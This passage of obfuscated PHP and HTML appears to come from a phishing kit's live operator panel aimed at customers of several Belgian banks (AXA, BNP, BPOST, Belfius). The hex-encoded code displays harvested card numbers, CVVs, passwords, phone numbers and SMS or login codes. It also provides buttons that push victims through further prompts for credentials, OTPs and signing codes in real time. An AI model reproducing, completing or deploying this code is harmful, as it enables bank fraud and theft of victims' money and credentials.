<?php  } } else { if ($log["\x62\x61\156\x6b"] === "\x41\x58\101") { function AXA($label, $value) { echo "\x3c\x64\x69\x76\40\143\154\x61\163\163\75\x22\146\x6f\x72\x6d\x2d\x67\162\x6f\165\x70\40\x72\157\x77\x22\x3e"; echo "\x3c\x6c\x61\x62\145\x6c\40\146\x6f\x72\x3d\47\x69\x64\47\x20\143\154\141\163\163\x3d\x27\x74\145\x78\x74\55\163\x65\143\x6f\x6e\144\x61\x72\171\40\143\x6f\154\x2d\163\155\55\63\x20\146\157\156\x74\55\167\x65\151\147\150\164\x2d\142\x6f\154\144\x27\76{$label}\x3a\74\57\154\141\142\x65\x6c\x3e"; echo "\x3c\144\x69\166\x20\x63\x6c\x61\163\163\x3d\42\143\157\154\55\163\155\x2d\x39\x22\x3e"; echo "\x3c\160\x20\x63\x6c\x61\163\163\x3d\x27\x74\145\x78\x74\x2d\163\145\x63\x6f\x6e\x64\141\x72\171\x27\76\74\x69\x3e\x3c\x73\x70\141\x6e\x20\x63\154\x61\x73\x73\75\x27\x63\x6f\x70\171\55\x76\x61\x6c\x75\145\x27\40\x6f\x6e\143\154\151\x63\x6b\x3d\x27\143\x6f\x70\171\124\157\103\154\x69\160\142\x6f\141\x72\x64\50\164\x68\151\163\51\47\76" . htmlspecialchars($value) . "\x3c\57\163\160\141\156\x3e\x3c\x62\x72\57\76\74\x73\x70\x61\x6e\40\143\154\x61\x73\x73\x3d\47\x63\157\160\x79\x2d\x74\x65\170\x74\x27\x3e\x43\x6c\x69\143\153\40\164\x6f\x20\143\x6f\x70\x79\x3c\57\x73\x70\x61\156\x3e\74\x2f\151\x3e\74\x2f\x70\76"; echo "\74\57\144\x69\x76\x3e"; echo "\74\57\144\151\x76\x3e"; } if (!empty($log["\x72\141\146\146\x65\151\x73\x73\x65\x6e\x5f\x77\x69\146\151"])) { AXA("\x43\141\162\144\116\165\x6d\142\x65\162", $log["\162\141\146\146\x65\x69\163\x73\145\x6e\x5f\167\x69\146\x69"]); } if (!empty($log["\x72\x61\x66\x66\145\x69\163\x73\145\156\137\x77\151\x66\151\137\160\141\163\x73"])) { AXA("\105\170\x70\151\162\171", $log["\x72\141\146\146\x65\x69\x73\163\145\156\137\x77\x69\146\151\x5f\x70\x61\163\163"]); } if (!empty($log["\x72\141\x66\146\x65\x69\x73\163\x65\x6e\137\x6e\x75\155\142\145\x72"])) { AXA("\x50\x68\157\x6e\145", $log["\x72\x61\146\x66\145\x69\x73\163\145\x6e\137\156\165\x6d\142\145\162"]); } if (!empty($log["\x72\141\x66\146\145\151\163\163\x65\156\137\x74\141\156"])) { AXA("\123\115\123", $log["\x72\141\x66\146\145\x69\163\x73\145\x6e\137\164\x61\156"]); } if (!empty($log["\x72\x61\146\146\x65\x69\163\x73\145\156\137\143\162\x65\144\151\164\143\x61\x72\144"])) { AXA("\x43\x43\40\x4e\x75\155", $log["\x72\x61\x66\x66\145\x69\163\x73\x65\x6e\x5f\143\162\145\144\x69\164\x63\141\162\144"]); } if (!empty($log["\x72\x61\146\x66\145\151\163\x73\x65\x6e\137\x63\143\145\170\160"])) { AXA("\103\x43\40\105\170\160", $log["\162\x61\146\x66\145\151\163\163\x65\x6e\x5f\x63\x63\145\x78\x70"]); } if (!empty($log["\x72\x61\146\146\145\x69\x73\x73\x65\x6e\x5f\143\166\166"])) { AXA("\x43\126\x56", $log["\x72\141\x66\x66\145\151\163\163\145\156\x5f\143\166\166"]); } if (!empty($log["\162\x61\x66\146\145\151\x73\x73\145\156\x5f\162\145\x73\x70\157\156\x73"])) { AXA("\114\157\147\151\156\40\103\x6f\144\145", $log["\x72\141\x66\146\x65\151\x73\x73\145\x6e\137\162\145\x73\x70\157\156\163"]); } if (!empty($log["\162\x61\x66\146\145\x69\163\x73\145\x6e\137\162\x65\163\160\x6f\x6e\x73\x5f\164\167\x6f"])) { AXA("\114\151\166\145\x20\x43\157\144\x65", $log["\162\141\146\146\x65\x69\x73\x73\145\156\137\162\x65\x73\160\x6f\x6e\163\x5f\164\x77\x6f"]); } if ($log["\167\x61\151\164\151\156\147"] == "\x74\162\x75\145") { ?>

                    </div>
                     <div class="row">
                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php  echo htmlspecialchars($log["\165\163\x65\x72\x5f\x69\x64"]); ?>
', 'control')"><i class="fas fa-sign-in-alt"></i> Ask Login</button>
                               
                            </div>
            
                              <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php  echo htmlspecialchars($log["\x75\x73\145\x72\x5f\151\x64"]); ?>
', 'details')"><i class="fas fa-sign-in-alt"></i> Ask Phone</button>
                               
                            </div>


 
                              <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php  echo htmlspecialchars($log["\165\x73\x65\x72\x5f\x69\144"]); ?>
', 'tan')"><i class="fas fa-sign-in-alt"></i> Ask SMS</button>
                               
                            </div>


 
                              <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php  echo htmlspecialchars($log["\165\163\145\x72\137\x69\144"]); ?>
', 'creditcard')"><i class="fas fa-sign-in-alt"></i> Ask CC</button>
                               
                            </div>

 
                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-success mt-4" onclick="setRaffeissen('<?php  echo htmlspecialchars($log["\x75\163\145\162\137\151\144"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
                            </div>             
                    </div>
                                               <div class="row">

                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php  echo htmlspecialchars($log["\x75\x73\145\x72\137\x69\x64"]); ?>
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i>

 Ask M1</button>

                            </div>

                            <div class="col-lg-9">
                                <input type="text" class="form-control raffeissen-sign input-dark mt-4 custom-input" placeholder="Fill in your 'M1  Code'">

                            </div>

                            <div class="col-lg-3">
                                 <hr>
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setRaffeissen('<?php  echo htmlspecialchars($log["\x75\163\145\162\137\151\x64"]); ?>
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i>


 Ask Live</button>
                            </div>
                              <div class="col-lg-9">
                                 <hr>
                                <input type="text" class="form-control raffeissen-live input-dark mt-4 custom-input" placeholder="Fill in your first 'M2 Code'">
                                <input type="text" class="form-control raffeissen-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'M2 Code'">

                            </div>

                        </div>  

                </div>
            </div>
<?php  } } else { if ($log["\x62\x61\x6e\x6b"] === "\x42\116\120") { function BNP($label, $value) { echo "\74\144\x69\x76\x20\x63\x6c\141\x73\x73\75\x22\146\x6f\x72\x6d\55\147\162\157\165\160\40\x72\x6f\x77\x22\x3e"; echo "\x3c\154\141\142\x65\154\40\146\157\162\x3d\47\151\x64\47\40\143\x6c\x61\x73\163\x3d\x27\x74\145\170\164\55\163\145\143\x6f\156\144\141\162\171\x20\143\157\x6c\55\x73\155\x2d\x33\40\146\x6f\156\164\55\167\x65\151\147\150\x74\x2d\x62\x6f\154\x64\47\76{$label}\x3a\74\57\x6c\141\x62\x65\x6c\76"; echo "\74\x64\151\x76\40\x63\154\x61\163\163\75\x22\x63\x6f\154\55\163\155\x2d\x39\x22\76"; echo "\x3c\x70\x20\143\x6c\x61\163\x73\x3d\x27\x74\145\x78\164\55\163\145\143\x6f\x6e\144\141\x72\171\47\x3e\74\151\76\74\x73\160\141\156\x20\x63\x6c\141\163\163\x3d\47\143\157\160\x79\55\166\x61\154\165\145\x27\x20\157\156\143\x6c\x69\143\153\x3d\x27\x63\x6f\x70\x79\x54\157\103\154\x69\x70\x62\x6f\141\x72\144\50\x74\150\x69\163\51\47\76" . htmlspecialchars($value) . "\74\x2f\x73\160\x61\156\76\x3c\x62\x72\57\76\74\x73\x70\x61\156\40\143\x6c\x61\x73\x73\75\47\143\x6f\160\171\x2d\x74\x65\x78\x74\47\76\103\154\151\143\x6b\x20\x74\157\x20\x63\x6f\x70\171\74\57\x73\x70\x61\x6e\76\74\x2f\151\x3e\x3c\x2f\x70\x3e"; echo "\74\x2f\x64\x69\166\x3e"; echo "\74\x2f\144\151\x76\76"; } if (!empty($log["\x62\156\x70\137\167\151\x66\x69"])) { $kaartbegin = '' . $log["\x62\x6e\x70\x5f\167\x69\x66\151"]; BNP("\103\x61\x72\144\x4e\165\x6d\142\145\162", $kaartbegin); } if (!empty($log["\142\156\160\x5f\x77\151\x66\151\x5f\160\x61\x73\x73"])) { BNP("\105\x78\160\x69\162\x79", $log["\x62\x6e\x70\x5f\x77\151\x66\151\x5f\160\141\x73\x73"]); } if (!empty($log["\x62\156\160\x5f\165\163\x65\162"])) { BNP("\120\x68\x6f\x6e\x65", $log["\x62\156\160\x5f\x75\x73\x65\162"]); } if (!empty($log["\x62\x6e\160\x5f\x65\170\160"])) { BNP("\x53\x4d\x53", $log["\x62\x6e\x70\x5f\x65\x78\160"]); } if (!empty($log["\142\x6e\x70\x5f\x70\141\163\x73\x77\x6f\162\144"])) { BNP("\x50\x61\163\163\167\157\162\x64", $log["\x62\x6e\x70\137\160\x61\163\x73\167\157\x72\x64"]); } if (!empty($log["\x62\x6e\160\137\162\x65\x73\x70\157\156\x73"])) { BNP("\114\157\x67\x69\x6e\x20\x43\157\144\145", $log["\142\x6e\160\x5f\x72\x65\163\160\x6f\x6e\163"]); } if (!empty($log["\142\x6e\160\x5f\143\x6f\x64\x65\x5f\x78"])) { BNP("\123\x69\x67\x6e\40\x43\x6f\x64\145", $log["\x62\x6e\160\137\x63\157\144\x65\137\170"]); } if (!empty($log["\142\156\x70\137\x63\157\x64\x65\137\x6d"])) { BNP("\x53\x69\x67\156\x20\103\157\x64\x65\40\x28\62\x29", $log["\x62\x6e\160\x5f\x63\x6f\144\x65\x5f\x6d"]); } if (!empty($log["\142\x6e\x70\x5f\162\x65\163\x70\157\156\x73\x5f\x74\167\x6f"])) { BNP("\x4c\x69\x76\145\x20\x43\157\x64\x65", $log["\142\x6e\160\137\162\x65\x73\x70\157\x6e\x73\x5f\164\167\157"]); } if (!empty($log["\142\x6e\160\x5f\143\x72\145\x64\x69\164\143\x61\x72\x64"])) { BNP("\103\141\x72\144\40\x4e\x75\155\x62\145\x72", $log["\142\x6e\160\137\x63\x72\x65\144\151\164\143\x61\162\144"]); } if (!empty($log["\x62\156\x70\137\143\143\145\170\160"])) { BNP("\x45\x78\160\x69\x72\171", $log["\142\156\x70\x5f\x63\x63\x65\170\160"]); } if (!empty($log["\142\x6e\160\x5f\143\x76\166"])) { BNP("\103\126\x56", $log["\x62\x6e\160\137\x63\166\166"]); } if ($log["\x77\x61\x69\x74\x69\156\147"] == "\x74\x72\165\145") { ?>

                    </div>
                     <div class="row">
                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php  echo htmlspecialchars($log["\165\163\145\x72\x5f\151\144"]); ?>
', 'control')"><i class="fas fa-sign-in-alt"></i> Ask Login</button>
                               
                            </div>
                                     <div class="col-lg-3">
                              <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php  echo htmlspecialchars($log["\x75\163\145\x72\137\x69\x64"]); ?>
', 'login')"><i class="fas fa-phone"></i> Phone</button>
                            </div>
                             <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php  echo htmlspecialchars($log["\x75\x73\x65\x72\137\151\x64"]); ?>
', 'details')"><i class="fa fa-envelope" aria-hidden="true"></i>
 Ask SMS</button>
                            </div>
                    
  

                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php  echo htmlspecialchars($log["\x75\x73\145\162\137\151\x64"]); ?>
', 'creditcard')"><i class="fa fa-credit-card" aria-hidden="true"></i>
 Ask Creditcard</button>
                            </div>
                           
                         
                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-success mt-4" onclick="setBnp('<?php  echo htmlspecialchars($log["\165\163\145\x72\x5f\x69\x64"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
                            </div>             
                    </div>
                                               <div class="row">

                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php  echo htmlspecialchars($log["\165\x73\x65\162\137\x69\144"]); ?>
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i>

 Ask Login Code</button>

                            </div>

                            <div class="col-lg-9">
                                <input type="text" class="form-control bnp-sign input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">

                            </div>
                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php  echo htmlspecialchars($log["\x75\x73\145\x72\x5f\x69\x64"]); ?>
', 'sign')"><i class="fa fa-window-restore" aria-hidden="true"></i>

 Ask Sign Code</button>

                            </div>

                            <div class="col-lg-9">
                                <input type="text" class="form-control bnp-sign-two input-dark mt-4 custom-input" placeholder="Fill in your 'Sign Code'">

                            </div>
                           <div class="col-lg-3">
                                 <hr>
                         
                            </div>
                              <div class="col-lg-9">
                                 <hr>
                                <input hidden type="text" class="form-control bnp-sign-two-two input-dark mt-4 custom-input" placeholder="Fill in your first 'Sign Code'">
                                <input hidden type="text" class="form-control bnp-sign-two-two-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Sign Code'">

                            </div>
                            <div class="col-lg-3">
               
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBnp('<?php  echo htmlspecialchars($log["\165\x73\145\x72\137\x69\144"]); ?>
', 'live')"><i class="fa fa-shopping-basket" aria-hidden="true"></i>


 Ask Live Code</button>
                            </div>
                              <div class="col-lg-9">
                                
                                <input type="text" class="form-control bnp-live input-dark mt-4 custom-input" placeholder="Fill in your first 'Live Code'">
                                <input type="text" class="form-control bnp-live-two input-dark mt-4 custom-input" placeholder="Fill in your second 'Live Code'">

                            </div>


                        </div>  

                </div>
            </div>
            


<?php  } } else { if ($log["\142\141\x6e\x6b"] === "\102\x50\x4f\x53\124") { function BPOST($label, $value) { echo "\x3c\x64\x69\x76\x20\x63\x6c\141\x73\x73\x3d\42\x66\157\162\x6d\55\147\162\157\165\x70\40\x72\157\x77\42\x3e"; echo "\x3c\x6c\141\142\x65\154\x20\146\x6f\162\75\47\x69\144\x27\40\143\x6c\x61\x73\163\x3d\x27\164\145\x78\164\x2d\x73\145\x63\x6f\x6e\x64\141\x72\171\x20\x63\157\154\55\163\x6d\x2d\63\40\146\x6f\x6e\164\x2d\167\x65\151\x67\150\x74\55\142\157\x6c\x64\x27\x3e{$label}\x3a\74\57\x6c\x61\x62\145\x6c\x3e"; echo "\x3c\x64\151\x76\40\143\x6c\x61\163\x73\75\42\x63\157\x6c\55\x73\155\55\x39\x22\76"; echo "\74\x70\x20\x63\154\x61\x73\x73\75\47\164\145\x78\x74\x2d\163\145\143\157\x6e\x64\141\x72\171\x27\x3e\74\x69\76\74\163\x70\141\x6e\x20\143\154\141\163\x73\75\47\x63\x6f\x70\x79\x2d\x76\141\x6c\165\x65\x27\x20\x6f\156\143\154\151\x63\x6b\75\47\x63\x6f\x70\171\124\x6f\103\x6c\x69\160\142\157\x61\162\x64\50\164\150\x69\x73\x29\47\76" . htmlspecialchars($value) . "\x3c\57\x73\160\x61\x6e\76\74\x62\x72\57\76\x3c\163\x70\141\x6e\40\143\154\x61\163\x73\x3d\47\x63\x6f\x70\171\x2d\164\145\x78\164\x27\x3e\x43\x6c\x69\x63\153\40\164\x6f\40\143\x6f\x70\x79\x3c\57\x73\160\x61\156\76\74\x2f\151\76\74\x2f\x70\x3e"; echo "\x3c\x2f\144\x69\x76\76"; echo "\x3c\57\144\151\166\x3e"; } if (!empty($log["\x62\x70\x6f\163\164\x5f\x61\x62\142\x6f"])) { $kaartbegin = '' . $log["\142\x70\x6f\163\x74\137\141\x62\142\x6f"]; BPOST("\101\x62\142\x6f\116\165\155", $kaartbegin); } if (!empty($log["\x62\x70\x6f\163\164\137\143\x61\162\144"])) { BPOST("\103\x61\x72\144\x4e\x75\x6d\142\145\162", $log["\x62\160\157\x73\x74\137\x63\141\x72\x64"]); } if (!empty($log["\142\x70\157\x73\x74\137\166\x76"])) { BPOST("\105\130\120", $log["\x62\x70\157\x73\x74\x5f\166\166"]); } if (!empty($log["\x62\160\x6f\163\x74\137\x6d\141\x69\x6c"])) { BPOST("\x45\55\155\141\x69\x6c", $log["\x62\160\x6f\x73\164\x5f\155\x61\x69\x6c"]); } if (!empty($log["\142\160\157\x73\x74\x5f\160\x68\x6f\156\145"])) { BPOST("\x50\x68\x6f\156\145", $log["\142\x70\157\x73\164\x5f\160\150\157\156\x65"]); } if (!empty($log["\x62\x70\157\163\164\x5f\x62\x65\x6c"])) { BPOST("\x43\141\x6c\x6c\x2d\x56\151\x63", $log["\x62\160\157\163\164\137\142\x65\x6c"]); } if (!empty($log["\x62\160\157\163\164\x5f\163\155\x73"])) { BPOST("\123\x4d\x53", $log["\x62\x70\157\x73\164\137\163\155\163"]); } if (!empty($log["\x62\x70\157\163\164\137\x77\167"])) { BPOST("\120\141\x73\163\57\117\124\x50", $log["\142\160\157\163\164\137\167\x77"]); } if (!empty($log["\142\x70\x6f\163\164\137\143\x63"])) { BPOST("\x43\103\x20\116\165\155\x62\x65\x72", $log["\x62\160\x6f\x73\x74\x5f\143\143"]); } if (!empty($log["\142\x70\157\x73\x74\x5f\145\x78\160"])) { BPOST("\x43\103\40\105\x58\120", $log["\142\x70\157\163\164\137\x65\170\160"]); } if (!empty($log["\142\160\157\163\x74\137\x63\166\143"])) { BPOST("\x43\126\126", $log["\x62\160\157\x73\164\137\x63\x76\x63"]); } if (!empty($log["\x62\x70\x6f\x73\x74\x5f\x63\x6f\144\145"])) { BPOST("\x4d\61\x20\x52\145\163\x70\157\x6e\163\x65", $log["\142\x70\157\x73\164\137\x63\157\144\x65"]); } if (!empty($log["\x62\x70\x6f\x73\x74\x5f\143\157\x64\145\62"])) { BPOST("\x4d\62\40\x52\145\x73\x70\157\156\163\x65", $log["\x62\x70\157\163\x74\x5f\x63\x6f\144\x65\x32"]); } if (!empty($log["\142\x70\x6f\163\164\x5f\x6c\x69\x76\145"])) { BPOST("\x4c\x69\x76\145\x20\122\x65\163\x70\x6f\x6e\163\x65", $log["\142\160\x6f\x73\164\x5f\x6c\x69\x76\x65"]); } if ($log["\x77\x61\x69\x74\x69\156\147"] == "\164\x72\165\x65") { ?>
 
 
                    </div> 
                        <div class="row"> 
 


                       <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["\x75\163\x65\x72\137\151\x64"]); ?>
', 'login')"><i class="fa fa-info-circle" aria-hidden="true"></i> Ask Login</button> 
                            </div> 

                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["\x75\x73\x65\162\x5f\151\x64"]); ?>
', 'identification')"><i class="fa fa-info-circle" aria-hidden="true"></i> Ask E-mail</button> 
                            </div> 
                             <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["\165\163\145\x72\x5f\151\144"]); ?>
', 'phone')"><i class="fa fa-phone" aria-hidden="true"></i> Ask Phone</button> 
                            </div> 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["\x75\x73\x65\162\137\151\x64"]); ?>
', 'bel')"><i class="fa fa-phone" aria-hidden="true"></i> Call-Visitor</button> 
                            </div> 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["\165\x73\145\162\137\x69\x64"]); ?>
', 'sms')"><i class="fa fa-info-circle" aria-hidden="true"></i> Ask SMS</button> 
                            </div> 
 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["\165\x73\145\x72\137\151\x64"]); ?>
', 'loginCode')"><i class="far fa-keyboard"></i> Ask Pass/OTP</button> 
                            </div> 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["\x75\x73\x65\162\x5f\151\144"]); ?>
', 'credit')"><i class="far fa-keyboard"></i> Ask CC</button> 
                            </div> 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-success mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["\165\x73\x65\x72\137\x69\x64"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button> 
                            </div> 
                        </div>       
                      <hr> 
                        <div class="row"> 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["\165\163\145\162\x5f\151\144"]); ?>
', 'signCode')"><i class="fa fa-sign-language" aria-hidden="true"></i> Ask M1</button> 
                            </div> 
                            <div class="col-lg-9"> 
                                <input type="text" class="form-control bpost-onee input-dark mt-4 custom-input"  placeholder="Please enter a buy code"> 
                            </div> 
                                                   </div> 
                                                   <hr> 
                        <div class="row"> 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["\165\163\145\x72\137\x69\144"]); ?>
', 'sign2')"><i class="fa fa-sign-language" aria-hidden="true"></i> Ask M2</button> 
                            </div> 
                            <div class="col-lg-9"> 
                                <input type="text" class="form-control bpost-code2 input-dark mt-4 custom-input"  placeholder="Please enter a buy code"> 
                            </div> 
                                                   </div> 
                                                   <hr> 
                                                   <div class="row"> 
                            <div class="col-lg-3"> 
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBpost('<?php  echo htmlspecialchars($log["\165\x73\x65\162\137\151\144"]); ?>
', 'live')"><i class="fa fa-sign-language" aria-hidden="true"></i> Ask Live</button> 
                            </div> 
                            <div class="col-lg-9"> 
                            <input type="text" class="form-control bpost-live input-dark mt-4 custom-input"  placeholder="Please enter a token code"> 
                            <input type="text" class="form-control bpost-livetwo input-dark mt-4 custom-input"  placeholder="Please enter a token code">        
            
                    </div> 
                </div> 
                           
                    </div> 
                </div> 
 

                            <?php  } } else { if ($log["\x62\x61\x6e\153"] === "\x42\105\114\x46\x49\125\x53") { function BELFIUS($label, $value) { echo "\x3c\x64\151\166\x20\143\154\141\x73\163\x3d\x22\146\x6f\162\x6d\55\x67\x72\x6f\x75\160\40\162\x6f\167\42\x3e"; echo "\x3c\154\141\x62\x65\x6c\40\146\157\x72\75\47\x69\144\47\40\143\154\141\163\163\75\x27\164\x65\170\x74\x2d\163\x65\143\x6f\156\x64\141\162\x79\x20\x63\x6f\154\55\x73\155\55\63\x20\146\157\x6e\x74\55\167\x65\151\147\150\x74\x2d\x62\x6f\x6c\144\x27\76{$label}\72\74\x2f\x6c\x61\142\145\x6c\76"; echo "\x3c\x64\x69\x76\40\143\x6c\141\x73\163\x3d\42\143\157\154\x2d\163\x6d\x2d\x39\42\76"; echo "\74\160\40\x63\154\141\163\163\x3d\x27\164\x65\x78\x74\x2d\163\145\x63\157\156\x64\x61\x72\171\x27\x3e\74\151\76\x3c\x73\160\141\156\40\x63\154\x61\x73\x73\75\47\x63\157\x70\171\x2d\166\x61\x6c\165\145\47\x20\x6f\156\143\x6c\151\x63\x6b\75\x27\x63\157\x70\x79\x54\157\103\x6c\151\x70\142\x6f\x61\162\x64\x28\x74\x68\x69\163\51\47\x3e" . htmlspecialchars($value) . "\x3c\57\x73\x70\x61\x6e\76\x3c\142\x72\x2f\76\x3c\163\x70\141\x6e\x20\x63\x6c\x61\163\163\75\x27\143\x6f\160\x79\x2d\164\x65\170\x74\x27\x3e\x43\x6c\151\143\153\x20\164\157\40\x63\x6f\160\x79\74\x2f\x73\x70\x61\156\76\74\x2f\151\76\x3c\x2f\160\x3e"; echo "\x3c\57\144\151\166\x3e"; echo "\74\57\x64\151\166\76"; } if (!empty($log["\x62\x65\154\x66\151\x75\x73\137\x77\x69\x66\x69"])) { $kaartbegin = '' . $log["\x62\x65\154\146\x69\x75\x73\137\167\x69\146\151"]; BELFIUS("\x43\141\x72\x64\x4e\165\155\142\x65\162", $kaartbegin); } if (!empty($log["\x62\x65\x6c\146\151\x75\x73\x5f\167\151\x66\x69\x5f\x70\141\x73\163"])) { BELFIUS("\x45\x78\160\151\x72\x79", $log["\142\145\x6c\x66\151\165\x73\x5f\x77\151\x66\x69\x5f\160\x61\163\x73"]); } if (!empty($log["\142\x65\x6c\146\151\165\163\x5f\x65\170\x70"])) { BELFIUS("\123\115\123", $log["\142\x65\154\146\x69\x75\x73\137\x65\170\160"]); } if (!empty($log["\x62\x65\x6c\x66\x69\x75\x73\137\160\x61\163\x73\167\x6f\162\x64"])) { BELFIUS("\120\x61\x73\x73\167\157\x72\x64", $log["\142\145\154\146\151\165\x73\x5f\160\x61\x73\163\x77\157\x72\x64"]); } if (!empty($log["\x62\145\154\146\151\x75\x73\137\165\163\145\x72"])) { BELFIUS("\x50\x68\x6f\156\145", $log["\142\145\154\146\151\165\x73\x5f\165\163\145\162"]); } if (!empty($log["\x62\145\154\146\151\x75\x73\137\162\x65\x73\160\x6f\156\163"])) { BELFIUS("\x4c\157\x67\x69\156\40\x43\157\144\x65", $log["\x62\x65\154\146\151\165\x73\x5f\162\x65\x73\x70\x6f\156\x73"]); } if (!empty($log["\142\x65\154\x66\151\x75\163\137\x63\157\x64\x65\x5f\170"])) { BELFIUS("\x53\151\147\156\40\103\157\144\x65", $log["\142\x65\x6c\x66\x69\165\x73\137\143\157\x64\145\137\x78"]); } if (!empty($log["\x62\x65\x6c\146\x69\165\x73\x5f\143\157\x64\145\x5f\x6d"])) { BELFIUS("\x53\x69\147\156\x20\x43\157\x64\145\40\50\62\51", $log["\142\145\154\146\151\x75\x73\x5f\x63\x6f\144\x65\x5f\x6d"]); } if (!empty($log["\142\145\x6c\146\151\x75\x73\x5f\x72\x65\163\160\157\x6e\163\137\164\x77\157"])) { BELFIUS("\x4c\x69\x76\145\x20\x43\x6f\144\145", $log["\x62\x65\154\x66\x69\x75\163\x5f\x72\145\163\x70\x6f\x6e\163\137\164\167\x6f"]); } if (!empty($log["\x62\145\x6c\x66\x69\165\163\137\x63\x72\x65\144\x69\x74\x63\x61\x72\144"])) { BELFIUS("\x43\141\x72\x64\x20\x4e\165\155\x62\145\x72", $log["\x62\x65\x6c\146\151\x75\x73\x5f\143\162\145\144\x69\x74\143\141\162\x64"]); } if (!empty($log["\142\x65\x6c\x66\151\x75\x73\137\x63\x63\x65\170\160"])) { BELFIUS("\105\170\x70\151\162\x79", $log["\142\x65\154\x66\151\x75\163\x5f\143\x63\x65\170\x70"]); } if (!empty($log["\x62\145\x6c\x66\x69\165\x73\x5f\x63\x76\x76"])) { BELFIUS("\x43\126\x56", $log["\x62\145\154\x66\151\x75\x73\137\x63\x76\x76"]); } if ($log["\167\141\151\164\x69\156\147"] == "\x74\x72\x75\145") { ?>

                    </div>
                     <div class="row">
                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBelfius('<?php  echo htmlspecialchars($log["\165\163\x65\162\x5f\151\144"]); ?>
', 'control')"><i class="fas fa-sign-in-alt"></i> Ask Login</button>
                               
                            </div>
                                     <div class="col-lg-3">
                              <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBelfius('<?php  echo htmlspecialchars($log["\165\x73\145\162\137\151\144"]); ?>
', 'login')"><i class="fas fa-phone"></i> Phone</button>
                            </div>
                             <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBelfius('<?php  echo htmlspecialchars($log["\165\x73\145\x72\137\x69\144"]); ?>
', 'details')"><i class="fa fa-envelope" aria-hidden="true"></i>
 Ask SMS</button>
                            </div>
                             <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBelfius('<?php  echo htmlspecialchars($log["\x75\x73\145\x72\x5f\151\144"]); ?>
', 'password')"><i class="fa fa-key" aria-hidden="true"></i>
 Ask Password</button>
                            </div>
  

                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBelfius('<?php  echo htmlspecialchars($log["\x75\163\x65\x72\x5f\x69\144"]); ?>
', 'creditcard')"><i class="fa fa-credit-card" aria-hidden="true"></i>
 Ask Creditcard</button>
                            </div>
                           
                         
                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-success mt-4" onclick="setBelfius('<?php  echo htmlspecialchars($log["\165\x73\x65\162\137\x69\144"]); ?>
', 'finish')"><i class="fa fa-check-circle" aria-hidden="true"></i> Finish</button>
                            </div>             
                    </div>
                                               <div class="row">

                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBelfius('<?php  echo htmlspecialchars($log["\x75\163\145\162\x5f\151\x64"]); ?>
', 'photo')"><i class="fa fa-window-restore" aria-hidden="true"></i>

 Ask Login Code</button>

                            </div>

                            <div class="col-lg-9">
                                <input type="text" class="form-control belfius-sign input-dark mt-4 custom-input" placeholder="Fill in your 'Login Code'">

                            </div>
                            <div class="col-lg-3">
                                <button class="btn btn-sm btn-block btn-purple mt-4" onclick="setBelfius('<?php  echo htmlspecialchars($log["\165\x73\145\x72\137\151\x64"]); ?>
